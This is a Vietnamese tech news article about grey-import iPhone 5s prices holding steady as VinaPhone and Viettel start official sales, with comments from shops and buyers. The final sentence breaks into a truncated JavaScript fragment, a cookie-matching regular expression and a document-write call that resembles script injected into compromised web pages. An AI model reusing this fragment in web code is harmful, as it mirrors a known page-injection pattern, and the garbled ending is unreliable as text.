Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Giá iPhone 5s xách tay sẽ khó giảm xuống hơn nữa

Giá iPhone 5s xách tay sẽ khó giảm xuống hơn nữa

Nhiều cửa hàng chuyên kinh doanh điện thoại cho biết, giá iPhone 5s xách tay sẽ vẫn giữ giá. Nhiều nơi đã nhập một lượng hàng lớn và khó giảm để tránh lỗ.

Ngày mai bắt đầu bán iPhone mới chính hãng tại Việt Nam

Hai nhà mạng lớn ở Việt Nam là VinaPhone và Viettel đã thông báo sẽ chính thức bán iPhone 5s từ ngày 15/11 với giá từ 15,6 triệu đồng, rẻ hơn 600K – 1 triệu đồng so với hàng xách tay. Không chỉ cạnh tranh về giá, phiên bản chính hãng của 2 nhà mạng có thể sẽ đi kèm thêm gói khuyến mãi cước 3G dành riêng cho người dùng iPhone.

Ngày mai bắt đầu bán iPhone 5s và iPhone 5C chính hãng tại Việt Nam

Không quá bất ngờ với thông tin trên, nhiều cửa hàng bán iPhone 5s xách tay cho biết, họ chưa thể giảm giá bán của sản phẩm này xuống bởi họ còn phụ thuộc vào giá nguồn hàng nhập. Anh Nguyễn Anh Văn  (đại diện của một cửa hàng) cho biết: “Trong khi phiên bản iPhone mới chính hãng chưa được bán ra, chúng tôi vẫn bán với giá hiện tại, vì bản thân giá nhập từ đầu mối đã cao hơn so với hàng chính hãng. Trong thời gian tới, cửa hàng sẽ giảm giá xuống khi giá đầu vào thấp hơn”. Hệ thống iShop cũng không giảm giá phiên bản xách tay vì nó không ảnh hưởng nhiều trước chính sách của nhà mạng. “Lợi nhuận từ việc bán iPhone 5s ra rất thấp, bán ra chủ yếu để chiều lòng khách hàng vì họ muốn sở hữu sản phẩm này sớm. Là một đại lý của Apple, nên chúng tôi cũng vẫn ưu bán ra các sản phẩm chính hãng được phân phối bởi FPT với mức giá tương đương với các nhà mạng”, anh Đỗ Quốc Tuấn (đại diện của iShop) đã chia sẻ. Cửa hàng Bạch Long Mobile ở TP HCM cũng sẽ bán ra iPhone chính hãng do FPT phân phối song song với hàng xách tay, phiên bản chính hãng sẽ mang lại doanh thu và lợi nhuận cao cho cửa hàng khi mà giá iPhone 5s xách tay không thể giảm xuống thấp hơn được nữa.

Người dùng đổi ý định mua hàng chính hãng

iPhone 5s hàng xách tay sẽ ít được giảm giá xuống

Sau khi biết thông tin 2 nhà mạng lớn nhất của Việt Nam chuẩn bị bán ra iPhone mới chính hãng, hầu hết người dùng đã chuyển sang chờ đợi thay vì mua iPhone 5s xách tay với giá cao. Chị Minh Anh (TP HCM) chia sẻ: “chỉ còn vài ngày nữa thôi, mua hàng chính hãng vừa rẻ hơn, vừa hưởng trọn chế độ bảo hành của Apple”. Giống như chị Anh, anh Tuấn Tú (Hà Nội) cho biết: “Nếu chi phí cước 3G hợp lý hơn tôi sẽ mua iPhone mới chính hãng của nhà mạng”.

Tuy mức giá mềm hơn và được hưởng chế độ bảo hành 12 tháng của Apple, nhưng người dùng iPhone sẽ vấp phải những bất lợi nhất định. Đối với nhà mạng Viettel, người dùng sẽ chỉ được dùng SIM Viettel, hoặc phải bỏ thêm 700K để mở mạng, trong khi đó đối với iPhone hàng xách tay đã là phiên bản quốc tế và được các cửa hàng hỗ trợ cài đặt gói phần mềm, trò chơi có bản quyền. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘